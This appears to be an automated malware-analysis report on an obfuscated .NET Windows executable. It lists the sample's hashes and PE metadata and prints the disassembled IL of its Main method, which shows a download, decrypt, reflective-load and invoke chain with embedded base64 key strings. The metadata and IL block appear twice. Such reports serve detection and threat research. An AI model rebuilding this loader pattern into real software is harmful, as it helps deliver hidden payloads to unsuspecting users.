Symbol Ofbuscation Score
|
Hash | Hash Value |
|---|---|
| MD5 | f506cc2f34301436cb8b7388fce7ff99
|
| Sha1 | 7f097aa5c16d0592d49d551d5d716dab30bea73d
|
| Sha256 | 2b3b53a5156b258cbe1babe783c03f3b3733c1b51a45fc6b23d84f4a84b50b84
|
| Sha384 | ff0e50a3f9115ca9b32a717aa083b578dde388dd5093ff3f6cec79e54638584a716e28b126847607a4d138b7709da7c9
|
| Sha512 | 37dea99344ca3e094807c7acd4f485ed7164486cdd3bc4281545b5baacdda0766130bf253a59215ee0bc08045c05bf4d04ca7a089cd8a100b0927e60287bd827
|
| SSDeep | 24576:P8XeN5j0E2B1kViP+XmlyTIALRxKniWUPkOQKCpP4b:P8XyW1kV/2lyTNxK1Oe
|
| TLSH | 4525333B44ADD221CD6A87FE26230C9AA2F0F015DDA09B61FB3CD5FA4F56B4C1980671
|
PeID
|
Name0 | Value |
|---|---|
| Info | PE Detect: PeReader OK (file layout) |
| Module Name | Xkidhrwspv |
| Full Name | Xkidhrwspv |
| EntryPoint | System.Void Xpmgg.Yqojljnuwpx::Main() |
| Scope Name | Xkidhrwspv |
| Scope Type | ModuleDef |
| Kind | Windows |
| Runtime Version | v4.0.30319 |
| Tables Header Version | 512 |
| WinMD Version | <null> |
| Assembly Name | Xkidhrwspv |
| Assembly Version | 1.0.8745.20097 |
| Assembly Culture | <null> |
| Has PublicKey | False |
| PublicKey Token | <null> |
| Target Framework | .NETFramework,Version=v4.6 |
| Total Strings | 48 |
| Main Method | System.Void Xpmgg.Yqojljnuwpx::Main() |
| Main IL Instruction Count | 60 |
| Main IL | newobj System.Void Xpmgg.Yqojljnuwpx/<>c__DisplayClass0_0::.ctor() stloc.0 <null> ldstr KhhwR+CR19n9RlPHK6EZbg== stloc.1 <null> ldstr U78Ju/mznFA= stloc.2 <null> ldsfld System.Func`1<System.Byte[]> Xpmgg.Yqojljnuwpx/<>c::<>9__0_0 dup <null> brtrue.s IL_0031: newobj System.Void Xpmgg.Rnjjf::.ctor(System.Func`1<System.Byte[]>) pop <null> ldsfld Xpmgg.Yqojljnuwpx/<>c Xpmgg.Yqojljnuwpx/<>c::<>9 ldftn System.Byte[] Xpmgg.Yqojljnuwpx/<>c::<Main>b__0_0() newobj System.Void System.Func`1<System.Byte[]>::.ctor(System.Object,System.IntPtr) dup <null> stsfld System.Func`1<System.Byte[]> Xpmgg.Yqojljnuwpx/<>c::<>9__0_0 newobj System.Void Xpmgg.Rnjjf::.ctor(System.Func`1<System.Byte[]>) ldloc.0 <null> ldloc.1 <null> ldloc.2 <null> newobj System.Void Xpmgg.Fnljfatd::.ctor(System.String,System.String) stfld Xpmgg.Fnljfatd Xpmgg.Yqojljnuwpx/<>c__DisplayClass0_0::decryptor ldloc.0 <null> newobj System.Void Xpmgg.Tzdlqwueox::.ctor() stfld Xpmgg.Tzdlqwueox Xpmgg.Yqojljnuwpx/<>c__DisplayClass0_0::loader ldloc.0 <null> ldstr wxLA2wiaRR6vEbDuvB.jRxwQGStCcPNgog7RB ldstr KE5AOHRiD newobj System.Void Xpmgg.Xgkmp::.ctor(System.String,System.String) stfld Xpmgg.Xgkmp Xpmgg.Yqojljnuwpx/<>c__DisplayClass0_0::invoker dup <null> ldloc.0 <null> ldftn System.Void Xpmgg.Yqojljnuwpx/<>c__DisplayClass0_0::<Main>b__1(System.IO.MemoryStream) newobj System.Void System.Action`1<System.IO.MemoryStream>::.ctor(System.Object,System.IntPtr) callvirt System.Void Xpmgg.Rnjjf::add_DownloadCompleted(System.Action`1<System.IO.MemoryStream>) ldloc.0 <null> ldfld Xpmgg.Fnljfatd Xpmgg.Yqojljnuwpx/<>c__DisplayClass0_0::decryptor ldloc.0 <null> ldftn System.Void Xpmgg.Yqojljnuwpx/<>c__DisplayClass0_0::<Main>b__2(System.IO.MemoryStream) newobj System.Void System.Action`1<System.IO.MemoryStream>::.ctor(System.Object,System.IntPtr) callvirt System.Void Xpmgg.Fnljfatd::add_DecryptionCompleted(System.Action`1<System.IO.MemoryStream>) ldloc.0 <null> ldfld Xpmgg.Tzdlqwueox Xpmgg.Yqojljnuwpx/<>c__DisplayClass0_0::loader ldloc.0 <null> ldftn System.Void Xpmgg.Yqojljnuwpx/<>c__DisplayClass0_0::<Main>b__3(System.Reflection.Assembly) newobj System.Void System.Action`1<System.Reflection.Assembly>::.ctor(System.Object,System.IntPtr) callvirt System.Void Xpmgg.Tzdlqwueox::add_LoadCompleted(System.Action`1<System.Reflection.Assembly>) ldloc.0 <null> ldfld Xpmgg.Xgkmp Xpmgg.Yqojljnuwpx/<>c__DisplayClass0_0::invoker ldsfld System.Action Xpmgg.Yqojljnuwpx/<>c::<>9__0_4 dup <null> brtrue.s IL_00C8: callvirt System.Void Xpmgg.Xgkmp::add_InvocationCompleted(System.Action) pop <null> ldsfld Xpmgg.Yqojljnuwpx/<>c Xpmgg.Yqojljnuwpx/<>c::<>9 ldftn System.Void Xpmgg.Yqojljnuwpx/<>c::<Main>b__0_4() newobj System.Void System.Action::.ctor(System.Object,System.IntPtr) dup <null> stsfld System.Action Xpmgg.Yqojljnuwpx/<>c::<>9__0_4 callvirt System.Void Xpmgg.Xgkmp::add_InvocationCompleted(System.Action) callvirt System.Void Xpmgg.Rnjjf::Vdzoxq() ret <null> |
| Module Name | Xkidhrwspv |
| Full Name | Xkidhrwspv |
| EntryPoint | System.Void Xpmgg.Yqojljnuwpx::Main() |
| Scope Name | Xkidhrwspv |
| Scope Type | ModuleDef |
| Kind | Windows |
| Runtime Version | v4.0.30319 |
| Tables Header Version | 512 |
| WinMD Version | <null> |
| Assembly Name | Xkidhrwspv |
| Assembly Version | 1.0.8745.20097 |
| Assembly Culture | <null> |
| Has PublicKey | False |
| PublicKey Token | <null> |
| Target Framework | .NETFramework,Version=v4.6 |
| Total Strings | 48 |
| Main Method | System.Void Xpmgg.Yqojljnuwpx::Main() |
| Main IL Instruction Count | 60 |
| Main IL | newobj System.Void Xpmgg.Yqojljnuwpx/<>c__DisplayClass0_0::.ctor() stloc.0 <null> ldstr KhhwR+CR19n9RlPHK6EZbg== stloc.1 <null> ldstr U78Ju/mznFA= stloc.2 <null> ldsfld System.Func`1<System.Byte[]> Xpmgg.Yqojljnuwpx/<>c::<>9__0_0 dup <null> brtrue.s IL_0031: newobj System.Void Xpmgg.Rnjjf::.ctor(System.Func`1<System.Byte[]>) pop <null> ldsfld Xpmgg.Yqojljnuwpx/<>c Xpmgg.Yqojljnuwpx/<>c::<>9 ldftn System.Byte[] Xpmgg.Yqojljnuwpx/<>c::<Main>b__0_0() newobj System.Void System.Func`1<System.Byte[]>::.ctor(System.Object,System.IntPtr) dup <null> stsfld System.Func`1<System.Byte[]> Xpmgg.Yqojljnuwpx/<>c::<>9__0_0 newobj System.Void Xpmgg.Rnjjf::.ctor(System.Func`1<System.Byte[]>) ldloc.0 <null> ldloc.1 <null> ldloc.2 <null> newobj System.Void Xpmgg.Fnljfatd::.ctor(System.String,System.String) stfld Xpmgg.Fnljfatd Xpmgg.Yqojljnuwpx/<>c__DisplayClass0_0::decryptor ldloc.0 <null> newobj System.Void Xpmgg.Tzdlqwueox::.ctor() stfld Xpmgg.Tzdlqwueox Xpmgg.Yqojljnuwpx/<>c__DisplayClass0_0::loader ldloc.0 <null> ldstr wxLA2wiaRR6vEbDuvB.jRxwQGStCcPNgog7RB ldstr KE5AOHRiD newobj System.Void Xpmgg.Xgkmp::.ctor(System.String,System.String) stfld Xpmgg.Xgkmp Xpmgg.Yqojljnuwpx/<>c__DisplayClass0_0::invoker dup <null> ldloc.0 <null> ldftn System.Void Xpmgg.Yqojljnuwpx/<>c__DisplayClass0_0::<Main>b__1(System.IO.MemoryStream) newobj System.Void System.Action`1<System.IO.MemoryStream>::.ctor(System.Object,System.IntPtr) callvirt System.Void Xpmgg.Rnjjf::add_DownloadCompleted(System.Action`1<System.IO.MemoryStream>) ldloc.0 <null> ldfld Xpmgg.Fnljfatd Xpmgg.Yqojljnuwpx/<>c__DisplayClass0_0::decryptor ldloc.0 <null> ldftn System.Void Xpmgg.Yqojljnuwpx/<>c__DisplayClass0_0::<Main>b__2(System.IO.MemoryStream) newobj System.Void System.Action`1<System.IO.MemoryStream>::.ctor(System.Object,System.IntPtr) callvirt System.Void Xpmgg.Fnljfatd::add_DecryptionCompleted(System.Action`1<System.IO.MemoryStream>) ldloc.0 <null> ldfld Xpmgg.Tzdlqwueox Xpmgg.Yqojljnuwpx/<>c__DisplayClass0_0::loader ldloc.0 <null> ldftn System.Void Xpmgg.Yqojljnuwpx/<>c__DisplayClass0_0::<Main>b__3(System.Reflection.Assembly) newobj System.Void System.Action`1<System.Reflection.Assembly>::.ctor(System.Object,System.IntPtr) callvirt System.Void Xpmgg.Tzdlqwueox::add_LoadCompleted(System.Action`1<System.Reflection.Assembly>) ldloc.0 <null> ldfld Xpmgg.Xgkmp Xpmgg.Yqojljnuwpx/<>c__DisplayClass0_0::invoker ldsfld System.Action Xpmgg.Yqojljnuwpx/<>c::<>9__0_4 dup <null> brtrue.s IL_00C8: callvirt System.Void Xpmgg.Xgkmp::add_InvocationCompleted(System.Action) pop <null> ldsfld Xpmgg.Yqojljnuwpx/<>c Xpmgg.Yqojljnuwpx/<>c::<>9 ldftn System.Void Xpmgg.Yqojljnuwpx/<>c::<Main>b__0_4() newobj System.Void System.Action::.ctor(System.Object,System.IntPtr) dup <null> stsfld System.Action Xpmgg.Yqojljnuwpx/<>c::<>9__0_4 callvirt System.Void Xpmgg.Xgkmp::add_InvocationCompleted(System.Action) callvirt System.Void Xpmgg.Rnjjf::Vdzoxq() ret <null> |